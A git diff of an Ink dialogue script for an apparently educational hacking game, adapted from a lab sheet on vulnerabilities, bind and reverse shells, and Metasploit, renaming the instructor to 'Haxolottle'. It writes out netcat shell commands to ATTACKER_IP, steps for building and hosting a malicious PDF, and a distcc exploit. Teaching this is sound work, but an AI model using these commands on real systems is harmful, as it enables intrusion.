diff --git a/story_design/ink/game_scenarios/vulnerabilities_exploits.ink b/story_design/ink/game_scenarios/vulnerabilities_exploits.ink index 2fe7450..895e429 100644 --- a/story_design/ink/game_scenarios/vulnerabilities_exploits.ink +++ b/story_design/ink/game_scenarios/vulnerabilities_exploits.ink @@ -1,94 +1,86 @@ -// Vulnerabilities, Exploits, and Remote Access Payloads Lab Sheet +// Vulnerabilities and Exploitation - Game Scenario Version // Based on HacktivityLabSheets: introducing_attacks/3_vulnerabilities.md // Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio // License: CC BY-SA 4.0 // Global persistent state -VAR instructor_rapport = 0 -VAR exploitation_ethics = 0 +VAR haxolottle_rapport = 0 // External variables EXTERNAL player_name === start === -Penetration Testing Instructor: Welcome, Agent {player_name}. I'm your instructor for Vulnerabilities and Exploitation. +Haxolottle: {player_name}, want to learn about vulnerabilities and exploitation? -~ instructor_rapport = 0 -~ exploitation_ethics = 0 +~ haxolottle_rapport = 0 -Penetration Testing Instructor: This lab explores one of the most critical threats in cybersecurity: software vulnerabilities. Even systems running only "trusted" software from major vendors can be compromised due to programming mistakes. +Haxolottle: This is one of the most critical topics in cybersecurity, little axolotl. Even systems running "trusted" software from major vendors can be compromised due to programming mistakes. -Penetration Testing Instructor: We'll explore how attackers exploit weaknesses in software systems, the difference between bind shells and reverse shells, and get hands-on with the Metasploit framework. +Haxolottle: We'll explore how attackers exploit weaknesses, the difference between bind shells and reverse shells, and how to use the Metasploit framework. -Penetration Testing Instructor: Let me be clear: this knowledge is for authorized security testing, penetration testing engagements, and defensive purposes only. Understanding how attacks work is essential for defending against them. - -~ exploitation_ethics += 10 +Haxolottle: Important: this knowledge is for authorized security testing only. Understanding attacks helps you defend against them. -> vulnerability_hub === vulnerability_hub === -Penetration Testing Instructor: What aspect of vulnerabilities and exploitation would you like to explore? +Haxolottle: What would you like to know about? + [What are software vulnerabilities?] -> software_vulnerabilities_intro -+ [What causes software vulnerabilities?] ++ [What causes vulnerabilities?] -> vulnerability_causes -+ [Exploits and payloads - what's the difference?] ++ [Exploits and payloads] -> exploits_payloads -+ [Types of payloads and shellcode] ++ [Shellcode and payloads] -> shellcode_intro -+ [Bind shells - how do they work?] ++ [Bind shells] -> bind_shell_concept -+ [Reverse shells - the modern approach] ++ [Reverse shells] -> reverse_shell_concept -+ [Network Address Translation (NAT) considerations] ++ [Network Address Translation (NAT)] -> nat_considerations -+ [Introduction to Metasploit Framework] ++ [Metasploit Framework] -> metasploit_intro -+ [Using msfconsole - the interactive console] ++ [Using msfconsole] -> msfconsole_basics -+ [Local exploits - attacking client applications] ++ [Local exploits] -> local_exploits -+ [Remote exploits - attacking network services] ++ [Remote exploits] -> remote_exploits -+ [Show me the commands reference] ++ [Show me commands] -> commands_reference -+ [Practical challenge tips] - -> challenge_tips -+ [I'm ready for the lab exercises] - -> ready_for_practice -+ [That's all for now] ++ [I'm good for now] #exit_conversation -> END === software_vulnerabilities_intro === -Penetration Testing Instructor: Excellent question. A software vulnerability is a weakness in the security of a program. +Haxolottle: Excellent question. A software vulnerability is a weakness in the security of a program. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: Think about it this way: what if an attacker wants to run malicious code on a system that only allows "trusted" software from companies like Microsoft or Adobe? +Haxolottle: Think about it this way: what if an attacker wants to run malicious code on a system that only allows "trusted" software from companies like Microsoft or Adobe? -Penetration Testing Instructor: Unfortunately, it turns out that writing secure code is quite hard. Innocent and seemingly small programming mistakes can cause serious security vulnerabilities. +Haxolottle: Unfortunately, it turns out that writing secure code is quite hard. Innocent and seemingly small programming mistakes can cause serious security vulnerabilities. -Penetration Testing Instructor: In many cases, software vulnerabilities can lead to attackers being able to take control of the vulnerable software. When an attacker can run any code they like, this is known as "arbitrary code execution." +Haxolottle: In many cases, software vulnerabilities can lead to attackers being able to take control of the vulnerable software. When an attacker can run any code they like, this is known as "arbitrary code execution." + [What does arbitrary code execution allow an attacker to do?] - Penetration Testing Instructor: With arbitrary code execution, attackers can essentially assume the identity of the vulnerable software and misbehave. + Haxolottle: With arbitrary code execution, attackers can essentially assume the identity of the vulnerable software and misbehave. - Penetration Testing Instructor: For example, if they compromise a web browser, they can access anything the browser can access - your files, your cookies, your session tokens. + Haxolottle: For example, if they compromise a web browser, they can access anything the browser can access - your files, your cookies, your session tokens. - Penetration Testing Instructor: If they compromise a system service running as administrator or root, they have complete control over the entire system. + Haxolottle: If they compromise a system service running as administrator or root, they have complete control over the entire system. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Can you give me a real-world example?] - Penetration Testing Instructor: Sure. Adobe Reader versions before 8.1.2 had vulnerabilities that allowed attackers to craft malicious PDF documents. + Haxolottle: Sure. Adobe Reader versions before 8.1.2 had vulnerabilities that allowed attackers to craft malicious PDF documents. - Penetration Testing Instructor: When a victim opened the PDF, the attacker could execute arbitrary code on their system - just by opening what appeared to be a normal document. + Haxolottle: When a victim opened the PDF, the attacker could execute arbitrary code on their system - just by opening what appeared to be a normal document. - Penetration Testing Instructor: Another example is the Distcc vulnerability (CVE-2004-2687). Anyone who could connect to the Distcc port could execute arbitrary commands on the server. + Haxolottle: Another example is the Distcc vulnerability (CVE-2004-2687). Anyone who could connect to the Distcc port could execute arbitrary commands on the server. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tell me more about the causes] -> vulnerability_causes @@ -96,55 +88,55 @@ Penetration Testing Instructor: In many cases, software vulnerabilities can lead - -> vulnerability_hub === vulnerability_causes === -Penetration Testing Instructor: Software vulnerabilities arise from three main categories of mistakes. +Haxolottle: Software vulnerabilities arise from three main categories of mistakes. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: First, there are design flaws - fundamental mistakes in how the system was architected. These are problems with the concept itself, not just the implementation. +Haxolottle: First, there are design flaws - fundamental mistakes in how the system was architected. These are problems with the concept itself, not just the implementation. -Penetration Testing Instructor: Second, implementation flaws - mistakes in the programming code. This includes buffer overflows, SQL injection vulnerabilities, cross-site scripting flaws, and so on. +Haxolottle: Second, implementation flaws - mistakes in the programming code. This includes buffer overflows, SQL injection vulnerabilities, cross-site scripting flaws, and so on. -Penetration Testing Instructor: Third, misconfiguration - mistakes in settings and configuration. Even secure software can be made vulnerable through poor configuration choices. +Haxolottle: Third, misconfiguration - mistakes in settings and configuration. Even secure software can be made vulnerable through poor configuration choices. + [Which type is most common?] - Penetration Testing Instructor: Implementation flaws are incredibly common because programming secure code is difficult, especially in languages like C and C++ that don't have built-in protections. + Haxolottle: Implementation flaws are incredibly common because programming secure code is difficult, especially in languages like C and C++ that don't have built-in protections. - Penetration Testing Instructor: However, misconfigurations are also extremely prevalent because systems are complex and it's easy to overlook security settings. + Haxolottle: However, misconfigurations are also extremely prevalent because systems are complex and it's easy to overlook security settings. - Penetration Testing Instructor: Design flaws are less common but can be more fundamental and harder to fix without major rearchitecture. + Haxolottle: Design flaws are less common but can be more fundamental and harder to fix without major rearchitecture. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Can these vulnerabilities be completely prevented?] - Penetration Testing Instructor: That's a great question that gets at a fundamental challenge in security. + Haxolottle: That's a great question that gets at a fundamental challenge in security. - Penetration Testing Instructor: Complete prevention is nearly impossible in complex software. However, we can significantly reduce vulnerabilities through secure coding practices, code review, security testing, and using modern languages with built-in protections. + Haxolottle: Complete prevention is nearly impossible in complex software. However, we can significantly reduce vulnerabilities through secure coding practices, code review, security testing, and using modern languages with built-in protections. - Penetration Testing Instructor: This is why defense in depth is important - we assume vulnerabilities will exist and add layers of protection. + Haxolottle: This is why defense in depth is important - we assume vulnerabilities will exist and add layers of protection. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> vulnerability_hub === exploits_payloads === -Penetration Testing Instructor: Let me clarify these two important concepts. +Haxolottle: Let me clarify these two important concepts. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: An exploit is an action - or a piece of software that performs an action - that takes advantage of a vulnerability. +Haxolottle: An exploit is an action - or a piece of software that performs an action - that takes advantage of a vulnerability. -Penetration Testing Instructor: The result is that an attacker makes the system perform in ways that are not intentionally authorized. This could include arbitrary code execution, changes to databases, or denial of service like crashing the system. +Haxolottle: The result is that an attacker makes the system perform in ways that are not intentionally authorized. This could include arbitrary code execution, changes to databases, or denial of service like crashing the system. -Penetration Testing Instructor: The action that takes place when an exploit is successful is known as the payload. +Haxolottle: The action that takes place when an exploit is successful is known as the payload. + [So the exploit is the delivery mechanism?] - Penetration Testing Instructor: Exactly! Think of it like this: the exploit is the lock pick, and the payload is what you do once you're inside. + Haxolottle: Exactly! Think of it like this: the exploit is the lock pick, and the payload is what you do once you're inside. - Penetration Testing Instructor: The exploit leverages the vulnerability to gain control, and the payload is the malicious code that runs once control is achieved. + Haxolottle: The exploit leverages the vulnerability to gain control, and the payload is the malicious code that runs once control is achieved. - Penetration Testing Instructor: In Metasploit, you can mix and match exploits with different payloads, giving tremendous flexibility. + Haxolottle: In Metasploit, you can mix and match exploits with different payloads, giving tremendous flexibility. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What kinds of payloads are there?] -> shellcode_intro @@ -152,17 +144,17 @@ Penetration Testing Instructor: The action that takes place when an exploit is s - -> vulnerability_hub === shellcode_intro === -Penetration Testing Instructor: The most common type of payload is shellcode - code that gives the attacker shell access to the target system. +Haxolottle: The most common type of payload is shellcode - code that gives the attacker shell access to the target system. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: With shell access, attackers can interact with a command prompt and run commands on the target system as if they were sitting at the keyboard. +Haxolottle: With shell access, attackers can interact with a command prompt and run commands on the target system as if they were sitting at the keyboard. -Penetration Testing Instructor: Metasploit has hundreds of different payloads. You can list them with the msfvenom command: +Haxolottle: Metasploit has hundreds of different payloads. You can list them with the msfvenom command: -Penetration Testing Instructor: msfvenom -l payload | less +Haxolottle: msfvenom -l payload | less -Penetration Testing Instructor: There are two main approaches to achieving remote shell access: bind shells and reverse shells. +Haxolottle: There are two main approaches to achieving remote shell access: bind shells and reverse shells. + [What's a bind shell?] -> bind_shell_concept @@ -171,54 +163,54 @@ Penetration Testing Instructor: There are two main approaches to achieving remot -> reverse_shell_concept + [Which one should I use?] - Penetration Testing Instructor: In modern penetration testing, reverse shells are almost always the better choice. + Haxolottle: In modern penetration testing, reverse shells are almost always the better choice. - Penetration Testing Instructor: They bypass most firewall configurations and work even when the target is behind NAT. + Haxolottle: They bypass most firewall configurations and work even when the target is behind NAT. - Penetration Testing Instructor: But let me explain both so you understand the trade-offs. + Haxolottle: But let me explain both so you understand the trade-offs. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> vulnerability_hub === bind_shell_concept === -Penetration Testing Instructor: A bind shell is the simplest approach. The payload listens on the network for a connection, and serves up a shell to anything that connects. +Haxolottle: A bind shell is the simplest approach. The payload listens on the network for a connection, and serves up a shell to anything that connects. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: Think of it like this: the victim's computer opens a port and waits. The attacker then connects to that port and gets a command prompt. +Haxolottle: Think of it like this: the victim's computer opens a port and waits. The attacker then connects to that port and gets a command prompt. -Penetration Testing Instructor: You can simulate this with netcat. On the victim system, run: +Haxolottle: You can simulate this with netcat. On the victim system, run: -Penetration Testing Instructor: nc.exe -l -p 31337 -e cmd.exe -vv +Haxolottle: nc.exe -l -p 31337 -e cmd.exe -vv -Penetration Testing Instructor: Then from the attacker system, connect with: +Haxolottle: Then from the attacker system, connect with: -Penetration Testing Instructor: nc VICTIM_IP 31337 +Haxolottle: nc VICTIM_IP 31337 + [What do those netcat flags mean?] - Penetration Testing Instructor: Good attention to detail! Let me break it down: + Haxolottle: Good attention to detail! Let me break it down: - Penetration Testing Instructor: The -l flag tells netcat to listen as a service rather than connect as a client. + Haxolottle: The -l flag tells netcat to listen as a service rather than connect as a client. - Penetration Testing Instructor: The -p flag specifies the port number to listen on. + Haxolottle: The -p flag specifies the port number to listen on. - Penetration Testing Instructor: The -e flag executes the specified program (cmd.exe on Windows, /bin/bash on Linux) and pipes all interaction through the connection. + Haxolottle: The -e flag executes the specified program (cmd.exe on Windows, /bin/bash on Linux) and pipes all interaction through the connection. - Penetration Testing Instructor: The -vv flag makes it very verbose, showing you what's happening. + Haxolottle: The -vv flag makes it very verbose, showing you what's happening. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's the main limitation of bind shells?] - Penetration Testing Instructor: Excellent question. Firewalls and NAT routing are the main problems. + Haxolottle: Excellent question. Firewalls and NAT routing are the main problems. - Penetration Testing Instructor: Nowadays, firewalls typically prevent incoming network connections unless there's a specific reason to allow them - like the system being a web server. + Haxolottle: Nowadays, firewalls typically prevent incoming network connections unless there's a specific reason to allow them - like the system being a web server. - Penetration Testing Instructor: If the victim is behind a NAT router or firewall that blocks incoming connections, your bind shell is useless. + Haxolottle: If the victim is behind a NAT router or firewall that blocks incoming connections, your bind shell is useless. - Penetration Testing Instructor: This is why reverse shells became the dominant approach. + Haxolottle: This is why reverse shells became the dominant approach. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tell me about reverse shells instead] -> reverse_shell_concept @@ -226,39 +218,39 @@ Penetration Testing Instructor: nc VICTIM_IP 31337 - -> vulnerability_hub === reverse_shell_concept === -Penetration Testing Instructor: Reverse shells solve the firewall and NAT problems by reversing the connection direction. +Haxolottle: Reverse shells solve the firewall and NAT problems by reversing the connection direction. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: Instead of the attacker connecting to the victim, the victim connects to the attacker! +Haxolottle: Instead of the attacker connecting to the victim, the victim connects to the attacker! -Penetration Testing Instructor: Here's how it works: the attacker starts listening on their system, then the payload on the victim's system initiates an outbound connection to the attacker. +Haxolottle: Here's how it works: the attacker starts listening on their system, then the payload on the victim's system initiates an outbound connection to the attacker. -Penetration Testing Instructor: This works because firewalls typically allow outbound connections. They have to - otherwise you couldn't browse websites or check email. +Haxolottle: This works because firewalls typically allow outbound connections. They have to - otherwise you couldn't browse websites or check email. + [How do you set up a reverse shell with netcat?] - Penetration Testing Instructor: On the attacker system (Kali), start listening: + Haxolottle: On the attacker system (Kali), start listening: - Penetration Testing Instructor: nc -l -p 53 -vv + Haxolottle: nc -l -p 53 -vv - Penetration Testing Instructor: On the victim system, connect back: + Haxolottle: On the victim system, connect back: - Penetration Testing Instructor: nc.exe ATTACKER_IP 53 -e cmd.exe -vv + Haxolottle: nc.exe ATTACKER_IP 53 -e cmd.exe -vv - Penetration Testing Instructor: Notice the victim is making the connection, but you still get a shell on your attacker system. + Haxolottle: Notice the victim is making the connection, but you still get a shell on your attacker system. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Why use port 53 specifically?] - Penetration Testing Instructor: Brilliant observation! Port 53 is used by DNS - the Domain Name System that resolves domain names to IP addresses. + Haxolottle: Brilliant observation! Port 53 is used by DNS - the Domain Name System that resolves domain names to IP addresses. - Penetration Testing Instructor: Almost every Internet-connected system needs DNS to function. It's how "google.com" becomes an IP address. + Haxolottle: Almost every Internet-connected system needs DNS to function. It's how "google.com" becomes an IP address. - Penetration Testing Instructor: Because DNS is essential, it's extremely rare for firewalls to block outbound connections on port 53. + Haxolottle: Because DNS is essential, it's extremely rare for firewalls to block outbound connections on port 53. - Penetration Testing Instructor: By using port 53, we're disguising our reverse shell connection as DNS traffic, making it very likely to get through. + Haxolottle: By using port 53, we're disguising our reverse shell connection as DNS traffic, making it very likely to get through. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What about NAT and public IP addresses?] -> nat_considerations @@ -266,68 +258,68 @@ Penetration Testing Instructor: This works because firewalls typically allow out - -> vulnerability_hub === nat_considerations === -Penetration Testing Instructor: Network Address Translation adds another complication worth understanding. +Haxolottle: Network Address Translation adds another complication worth understanding. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: Often computer systems share one public IP address via a router, which then sends traffic to the correct local IP address using NAT. +Haxolottle: Often computer systems share one public IP address via a router, which then sends traffic to the correct local IP address using NAT. -Penetration Testing Instructor: Unless port forwarding is configured on the router, there's no way to connect directly to a system without a public IP address. +Haxolottle: Unless port forwarding is configured on the router, there's no way to connect directly to a system without a public IP address. -Penetration Testing Instructor: This is another reason reverse shells are necessary - they can start connections from behind NAT to systems with public IPs. +Haxolottle: This is another reason reverse shells are necessary - they can start connections from behind NAT to systems with public IPs. + [So the attacker needs a public IP?] - Penetration Testing Instructor: For a reverse shell to work, yes - the attacker needs a publicly routable IP address, or port forwarding from one. + Haxolottle: For a reverse shell to work, yes - the attacker needs a publicly routable IP address, or port forwarding from one. - Penetration Testing Instructor: This is why attackers often use VPS (Virtual Private Servers) or compromised servers as command and control infrastructure. + Haxolottle: This is why attackers often use VPS (Virtual Private Servers) or compromised servers as command and control infrastructure. - Penetration Testing Instructor: In penetration testing engagements, you might work with the client's network team to set up proper port forwarding. + Haxolottle: In penetration testing engagements, you might work with the client's network team to set up proper port forwarding. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What if both systems are behind NAT?] - Penetration Testing Instructor: Then you'd need more advanced techniques like tunneling through a public server, or exploiting Universal Plug and Play (UPnP) to create port forwards. + Haxolottle: Then you'd need more advanced techniques like tunneling through a public server, or exploiting Universal Plug and Play (UPnP) to create port forwards. - Penetration Testing Instructor: Some attack frameworks use domain generation algorithms or communicate through third-party services like social media APIs. + Haxolottle: Some attack frameworks use domain generation algorithms or communicate through third-party services like social media APIs. - Penetration Testing Instructor: But that's getting into advanced command and control techniques beyond this basic lab. + Haxolottle: But that's getting into advanced command and control techniques beyond this basic lab. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> vulnerability_hub === metasploit_intro === -Penetration Testing Instructor: The Metasploit Framework is one of the most powerful and comprehensive tools for exploitation and penetration testing. +Haxolottle: The Metasploit Framework is one of the most powerful and comprehensive tools for exploitation and penetration testing. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: At its core, Metasploit provides a framework - a set of libraries and tools for exploit development and deployment. +Haxolottle: At its core, Metasploit provides a framework - a set of libraries and tools for exploit development and deployment. -Penetration Testing Instructor: It includes modules for specific exploits, payloads, encoders, post-exploitation tools, and other extensions. +Haxolottle: It includes modules for specific exploits, payloads, encoders, post-exploitation tools, and other extensions. -Penetration Testing Instructor: The framework has several interfaces you can use: msfconsole (the interactive text console), the web-based Metasploit Community/Pro editions, and Armitage (a graphical interface). +Haxolottle: The framework has several interfaces you can use: msfconsole (the interactive text console), the web-based Metasploit Community/Pro editions, and Armitage (a graphical interface). + [How many exploits does it include?] - Penetration Testing Instructor: Depending on the version and when it was last updated, Metasploit typically includes over two thousand different exploits! + Haxolottle: Depending on the version and when it was last updated, Metasploit typically includes over two thousand different exploits! - Penetration Testing Instructor: When you start msfconsole, it reports the exact number of exploit modules available. + Haxolottle: When you start msfconsole, it reports the exact number of exploit modules available. - Penetration Testing Instructor: You can see them all with the "show exploits" command, though that list is quite long. + Haxolottle: You can see them all with the "show exploits" command, though that list is quite long. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's the typical workflow for using an exploit?] - Penetration Testing Instructor: Great question. Here's the standard process: + Haxolottle: Great question. Here's the standard process: - Penetration Testing Instructor: First, specify the exploit to use. Second, set options for the exploit like the IP address to attack. Third, choose a payload - this defines what happens on the compromised system. + Haxolottle: First, specify the exploit to use. Second, set options for the exploit like the IP address to attack. Third, choose a payload - this defines what happens on the compromised system. - Penetration Testing Instructor: Optionally, you can choose encoding to evade security monitoring like anti-malware or intrusion detection systems. + Haxolottle: Optionally, you can choose encoding to evade security monitoring like anti-malware or intrusion detection systems. - Penetration Testing Instructor: Finally, launch the exploit and see if it succeeds. + Haxolottle: Finally, launch the exploit and see if it succeeds. - Penetration Testing Instructor: The flexibility to combine any exploit with different payloads and encoding is what makes Metasploit so powerful. + Haxolottle: The flexibility to combine any exploit with different payloads and encoding is what makes Metasploit so powerful. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tell me more about msfconsole] -> msfconsole_basics @@ -335,415 +327,327 @@ Penetration Testing Instructor: The framework has several interfaces you can use - -> vulnerability_hub === msfconsole_basics === -Penetration Testing Instructor: Msfconsole is the interactive console interface that many consider the preferred way to use Metasploit. +Haxolottle: Msfconsole is the interactive console interface that many consider the preferred way to use Metasploit. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: Start it by simply running "msfconsole" - though it may take a moment to load. +Haxolottle: Start it by simply running "msfconsole" - though it may take a moment to load. -Penetration Testing Instructor: Once it's running, you have access to all of Metasploit's features through an interactive command line. +Haxolottle: Once it's running, you have access to all of Metasploit's features through an interactive command line. + [What commands should I know?] - Penetration Testing Instructor: Let me give you the essentials: + Haxolottle: Let me give you the essentials: - Penetration Testing Instructor: "help" shows all available commands. "show exploits" lists all exploit modules. "show payloads" lists available payloads. + Haxolottle: "help" shows all available commands. "show exploits" lists all exploit modules. "show payloads" lists available payloads. - Penetration Testing Instructor: "use exploit/path/to/exploit" selects an exploit. "show options" displays what needs to be configured. + Haxolottle: "use exploit/path/to/exploit" selects an exploit. "show options" displays what needs to be configured. - Penetration Testing Instructor: "set OPTION_NAME value" configures an option. "exploit" or "run" launches the attack. + Haxolottle: "set OPTION_NAME value" configures an option. "exploit" or "run" launches the attack. - Penetration Testing Instructor: "back" returns you to the main context if you want to change exploits. + Haxolottle: "back" returns you to the main context if you want to change exploits. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Can I run regular shell commands too?] - Penetration Testing Instructor: Yes! You can run local programs directly from msfconsole, similar to a standard shell. + Haxolottle: Yes! You can run local programs directly from msfconsole, similar to a standard shell. - Penetration Testing Instructor: For example, "ls /home/kali" works just fine from within msfconsole. + Haxolottle: For example, "ls /home/kali" works just fine from within msfconsole. - Penetration Testing Instructor: This is convenient because you don't need to exit msfconsole to check files or run quick commands. + Haxolottle: This is convenient because you don't need to exit msfconsole to check files or run quick commands. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Does it have tab completion?] - Penetration Testing Instructor: Absolutely! Msfconsole has excellent tab completion support. + Haxolottle: Absolutely! Msfconsole has excellent tab completion support. - Penetration Testing Instructor: You can press TAB while typing exploit paths, options, or commands to autocomplete them. + Haxolottle: You can press TAB while typing exploit paths, options, or commands to autocomplete them. - Penetration Testing Instructor: You can also use UP and DOWN arrow keys to navigate through your command history. + Haxolottle: You can also use UP and DOWN arrow keys to navigate through your command history. - Penetration Testing Instructor: These features make it much faster to work with Metasploit. + Haxolottle: These features make it much faster to work with Metasploit. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> vulnerability_hub === local_exploits === -Penetration Testing Instructor: Local exploits target applications running on the victim's computer, rather than network services. +Haxolottle: Local exploits target applications running on the victim's computer, rather than network services. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: These often require some social engineering to get the victim to open a malicious file or visit a malicious website. +Haxolottle: These often require some social engineering to get the victim to open a malicious file or visit a malicious website. -Penetration Testing Instructor: A classic example is the Adobe PDF Escape EXE vulnerability (CVE-2010-1240). This affected Adobe Reader versions before 8.1.2. +Haxolottle: A classic example is the Adobe PDF Escape EXE vulnerability (CVE-2010-1240). This affected Adobe Reader versions before 8.1.2. + [How does the PDF exploit work?] - Penetration Testing Instructor: You craft a malicious PDF document that exploits a vulnerability in how Adobe Reader processes embedded executables. + Haxolottle: You craft a malicious PDF document that exploits a vulnerability in how Adobe Reader processes embedded executables. - Penetration Testing Instructor: When the victim opens the PDF, they're prompted to execute a payload with a message that encourages them to click "Open." + Haxolottle: When the victim opens the PDF, they're prompted to execute a payload with a message that encourages them to click "Open." - Penetration Testing Instructor: If they click it, your payload executes on their system with their privileges. + Haxolottle: If they click it, your payload executes on their system with their privileges. - Penetration Testing Instructor: The Metasploit module is "exploit/windows/fileformat/adobe_pdf_embedded_exe" + Haxolottle: The Metasploit module is "exploit/windows/fileformat/adobe_pdf_embedded_exe" - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Walk me through creating a malicious PDF] - Penetration Testing Instructor: Sure! In msfconsole, start with: + Haxolottle: Sure! In msfconsole, start with: - Penetration Testing Instructor: use exploit/windows/fileformat/adobe_pdf_embedded_exe + Haxolottle: use exploit/windows/fileformat/adobe_pdf_embedded_exe - Penetration Testing Instructor: Then set the filename: set FILENAME timetable.pdf + Haxolottle: Then set the filename: set FILENAME timetable.pdf - Penetration Testing Instructor: Choose a payload: set PAYLOAD windows/shell/reverse_tcp + Haxolottle: Choose a payload: set PAYLOAD windows/shell/reverse_tcp - Penetration Testing Instructor: Configure where to connect back: set LHOST YOUR_IP and set LPORT YOUR_PORT + Haxolottle: Configure where to connect back: set LHOST YOUR_IP and set LPORT YOUR_PORT - Penetration Testing Instructor: Finally, run the exploit to generate the malicious PDF. + Haxolottle: Finally, run the exploit to generate the malicious PDF. - Penetration Testing Instructor: To receive the reverse shell, you need to set up a handler before the victim opens the PDF. + Haxolottle: To receive the reverse shell, you need to set up a handler before the victim opens the PDF. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I set up the handler to receive the connection?] - Penetration Testing Instructor: Good question! You use the multi/handler exploit: + Haxolottle: Good question! You use the multi/handler exploit: - Penetration Testing Instructor: use exploit/multi/handler + Haxolottle: use exploit/multi/handler - Penetration Testing Instructor: set payload windows/meterpreter/reverse_tcp + Haxolottle: set payload windows/meterpreter/reverse_tcp - Penetration Testing Instructor: set LHOST YOUR_IP + Haxolottle: set LHOST YOUR_IP - Penetration Testing Instructor: set LPORT YOUR_PORT (must match what you used in the PDF) + Haxolottle: set LPORT YOUR_PORT (must match what you used in the PDF) - Penetration Testing Instructor: Then run it and leave it listening. When the victim opens the PDF and clicks through, you'll get a shell! + Haxolottle: Then run it and leave it listening. When the victim opens the PDF and clicks through, you'll get a shell! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How would I deliver this PDF to a victim?] - Penetration Testing Instructor: In a real penetration test, you might host it on a web server and send a phishing email with a link. + Haxolottle: In a real penetration test, you might host it on a web server and send a phishing email with a link. - Penetration Testing Instructor: For the lab, you can start Apache web server and host the PDF there. + Haxolottle: For the lab, you can start Apache web server and host the PDF there. - Penetration Testing Instructor: Create a share directory: sudo mkdir /var/www/html/share + Haxolottle: Create a share directory: sudo mkdir /var/www/html/share - Penetration Testing Instructor: Copy your PDF there: sudo cp /home/kali/.msf4/local/timetable.pdf /var/www/html/share/ + Haxolottle: Copy your PDF there: sudo cp /home/kali/.msf4/local/timetable.pdf /var/www/html/share/ - Penetration Testing Instructor: Start Apache: sudo service apache2 start + Haxolottle: Start Apache: sudo service apache2 start - Penetration Testing Instructor: Then the victim can browse to http://YOUR_IP/share/timetable.pdf + Haxolottle: Then the victim can browse to http://YOUR_IP/share/timetable.pdf - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> vulnerability_hub === remote_exploits === -Penetration Testing Instructor: Remote exploits are even more dangerous because they target network services directly exposed to the Internet. +Haxolottle: Remote exploits are even more dangerous because they target network services directly exposed to the Internet. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Penetration Testing Instructor: No social engineering required - if the vulnerable service is accessible, you can often compromise it without any user interaction! +Haxolottle: No social engineering required - if the vulnerable service is accessible, you can often compromise it without any user interaction! -Penetration Testing Instructor: A great example is the Distcc vulnerability (CVE-2004-2687). Distcc is a program to distribute compilation of C/C++ code across systems on a network. +Haxolottle: A great example is the Distcc vulnerability (CVE-2004-2687). Distcc is a program to distribute compilation of C/C++ code across systems on a network. + [What makes Distcc vulnerable?] - Penetration Testing Instructor: Distcc has a documented security issue where anyone who can connect to the port can execute arbitrary commands as the distcc user. + Haxolottle: Distcc has a documented security issue where anyone who can connect to the port can execute arbitrary commands as the distcc user. - Penetration Testing Instructor: There's no authentication, no authorization checks. If you can reach the port, you can run commands. It's that simple. + Haxolottle: There's no authentication, no authorization checks. If you can reach the port, you can run commands. It's that simple. - Penetration Testing Instructor: This is a design flaw - the software was built for trusted networks and doesn't include any security controls. + Haxolottle: This is a design flaw - the software was built for trusted networks and doesn't include any security controls. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I exploit Distcc with Metasploit?] - Penetration Testing Instructor: The exploit module is exploit/unix/misc/distcc_exec. Let me walk you through it: + Haxolottle: The exploit module is exploit/unix/misc/distcc_exec. Let me walk you through it: - Penetration Testing Instructor: First, use the exploit: use exploit/unix/misc/distcc_exec + Haxolottle: First, use the exploit: use exploit/unix/misc/distcc_exec - Penetration Testing Instructor: Set the target: set RHOST VICTIM_IP + Haxolottle: Set the target: set RHOST VICTIM_IP - Penetration Testing Instructor: Choose a payload: set PAYLOAD cmd/unix/reverse + Haxolottle: Choose a payload: set PAYLOAD cmd/unix/reverse - Penetration Testing Instructor: Configure your listener: set LHOST YOUR_IP and set LPORT YOUR_PORT + Haxolottle: Configure your listener: set LHOST YOUR_IP and set LPORT YOUR_PORT - Penetration Testing Instructor: Then launch: exploit + Haxolottle: Then launch: exploit - Penetration Testing Instructor: Unlike the PDF exploit, msfconsole automatically starts the reverse shell handler for remote exploits! + Haxolottle: Unlike the PDF exploit, msfconsole automatically starts the reverse shell handler for remote exploits! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Can I check if a target is vulnerable first?] - Penetration Testing Instructor: Great thinking! Some Metasploit exploits support a "check" command. + Haxolottle: Great thinking! Some Metasploit exploits support a "check" command. - Penetration Testing 